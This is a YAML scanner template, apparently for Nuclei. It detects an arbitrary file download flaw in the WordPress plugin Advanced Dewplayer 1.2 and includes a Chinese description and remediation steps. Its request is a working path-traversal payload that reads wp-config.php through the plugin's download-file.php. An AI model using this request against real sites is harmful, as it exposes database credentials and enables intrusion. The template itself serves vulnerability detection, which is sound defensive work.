id: WordPressPlugin-Advanced-Dewplayerlfd
info:
  name: WordPress Plugin Advanced Dewplayer_1.2_任意下载漏洞
  author:
  - jim2g
  description: |
    WordPress Plugin Advanced Dewplayer_1.2_存在任意下载漏洞
    任意文件下载漏洞不同于网站目录浏览，此漏洞不仅仅可遍历系统下web中的文件，而且可以浏览或者下载到系统中的文件，攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。一般来说，攻击者利用服务器API、文件标准权限进行攻击。任意文件读取/下载漏洞可能存在于Web服务器软件本身，也可能存在于Web应用程序之中。
  severity: high
  remediation: |
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：
    https://wpscan.com/
    临时修复方案：
    1、过滤\".\"，使用户在url中不能回溯上级目录。
    2、正则匹配严格判断用户输入参数的格式，对用户传过来的文件名参数进行硬编码或统一编码，对文件类型进行白名单控制，对包含恶意字符或者空字符的参数进行拒绝。
    3、禁止系统提供目录遍历服务，如：php.ini配置open_basedir限定文件访问范围。
    4、文件路径保存至数据库，让用户提交文件对应ID下载文件。
    5、用户下载文件之前进行权限校验。
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,"<?php")
  raw:
  - |
    GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1
    Host: {{Hostname}}
  req-condition: true
